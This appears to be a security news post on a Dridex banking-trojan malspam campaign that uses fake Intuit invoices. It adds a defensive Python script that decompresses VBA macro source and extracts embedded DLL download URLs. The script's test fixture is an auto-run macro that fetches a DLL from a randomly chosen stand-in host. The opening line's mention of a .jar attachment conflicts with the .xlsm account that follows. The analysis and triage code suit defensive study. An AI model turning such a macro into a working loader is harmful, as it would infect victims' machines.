The .jar attachment downloads the malware, a Trojan capable of stealing credentials and loading additional malicious payloads onto the victim's PC.
Technical analysis by the Malware Hunter JAMESWT
A new malspam campaign delivers Dridex using Intuit and a fake invoice as bait. The e-mail attachments, .xlsm documents, contact a link chosen at random from a list embedded in the document. This downloads a DLL that starts the malware infection.
Dridex is still hiding behind Intuit in a new cybercrime malspam campaign. E-mails in the wild use the company's name and an attached fake invoice as bait. The attachment is an .xlsm document which, if opened with macros enabled, contacts a malicious link chosen at random from a list embedded in the file. It then downloads a DLL that infects the computer with the malware. Dridex is a very dangerous banking Trojan used by cybercriminals; it has long featured in campaigns all over the world, especially with a courier theme. The targets are mainly companies, but not exclusively.
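Added example, not from the post or from JAMESWT's analysis: a Python triage script that reproduces, offline, the step the summary and the paragraph above describe for the attachment. It takes the compressed source of a VBA module (the MS-OVBA CompressedContainer format used for macro source inside vbaProject.bin), decompresses it, and pulls out the embedded URL list, any DLL downloads and the random-selection hint. Assumptions: the module source is taken to start at offset 0 of the supplied bytes (in a real vbaProject.bin you first parse the OLE container and read each module's MODULEOFFSET from the dir stream, for example with olefile or oletools); the macro text, hostnames and the use of VBA's Rnd for the random pick are constructed for this example; compress_ovba_literals exists only to build that fixture.

```python
import re
import struct


def decompress_ovba(data: bytes) -> bytes:
    """Decompress an MS-OVBA CompressedContainer (the format of a VBA module's
    source inside vbaProject.bin): literal and copy tokens per [MS-OVBA] 2.4.1."""
    if not data or data[0] != 0x01:
        raise ValueError("missing CompressedContainer signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        chunk_start = pos
        chunk_end = chunk_start + (header & 0x0FFF) + 3   # size field includes the 2-byte header
        pos += 2
        if not header & 0x8000:                          # raw chunk: 4096 literal bytes
            out += data[pos:pos + 4096]
            pos = chunk_end
            continue
        chunk_out = len(out)                             # DecompressedChunkStart
        while pos < chunk_end:
            flags = data[pos]
            pos += 1
            for bit in range(8):                         # one FlagByte covers eight tokens
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:               # literal token: copy one byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                decoded = len(out) - chunk_out
                bit_count = max(4, (decoded - 1).bit_length())   # ceil(log2(decoded)), minimum 4
                length_mask = 0xFFFF >> bit_count
                length = (token & length_mask) + 3
                offset = ((token & ~length_mask & 0xFFFF) >> (16 - bit_count)) + 1
                for _ in range(length):                  # overlapping back-reference copy
                    out.append(out[-offset])
        pos = chunk_end
    return bytes(out)


def compress_ovba_literals(src: bytes) -> bytes:
    """Fixture builder only: a valid single-chunk CompressedContainer made of
    literal tokens (real files also use copy tokens). Input must stay small."""
    if len(src) > 3000:
        raise ValueError("single-chunk literal helper; keep the fixture short")
    body = bytearray()
    for i in range(0, len(src), 8):
        body.append(0x00)                                # FlagByte: all eight tokens literal
        body += src[i:i + 8]
    header = 0xB000 | (len(body) + 2 - 3)                # compressed flag, signature 0b011, size-3
    return b"\x01" + struct.pack("<H", header) + bytes(body)


URL_RE = re.compile(rb'https?://[^\s"\'<>)]+', re.IGNORECASE)


def triage_module(stream: bytes, source_offset: int = 0) -> dict:
    """Decompress the module source found at source_offset (MODULEOFFSET from the
    dir stream; 0 is assumed for the constructed fixture) and report the
    indicators the post describes: the URL list and the DLL downloads."""
    source = decompress_ovba(stream[source_offset:])
    text = source.decode("latin-1")
    urls = [u.decode("latin-1") for u in URL_RE.findall(source)]
    dll_urls = [u for u in urls if u.lower().rsplit("?", 1)[0].endswith(".dll")]
    uses_rnd = bool(re.search(r"\bRnd\b", text))        # assumption: random pick done with VBA Rnd
    return {
        "urls": urls,
        "dll_urls": dll_urls,
        "uses_rnd": uses_rnd,
        "suspicious": len(dll_urls) >= 2 and uses_rnd,   # several DLL URLs plus a random choice
    }


# Constructed macro standing in for the attachment's internal list (not the real campaign's code).
SAMPLE_MACRO = b'''Sub Workbook_Open()
    Dim hosts
    hosts = Array("https://invoice-a.example/intuit/x.dll", _
                  "https://invoice-b.example/intuit/y.dll", _
                  "https://invoice-c.example/intuit/z.dll")
    Randomize
    Call Fetch(hosts(Int(Rnd * (UBound(hosts) + 1))))
End Sub
'''
SAMPLE_STREAM = compress_ovba_literals(SAMPLE_MACRO)

if __name__ == "__main__":
    print(triage_module(SAMPLE_STREAM))
```

For a real sample, feed triage_module the module stream bytes and the module's MODULEOFFSET instead of the fixture; the decompressor is the same code oletools-style extractors run before string and URL analysis, and it is the part that plain `strings` on vbaProject.bin cannot replace, since the embedded URL list is compressed on disk.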
The malicious e-mail detected by cocaman
The image of the fake Intuit invoice
The internal list from which the attachment randomly chooses the link used to download the DLL and infect the machine with the malware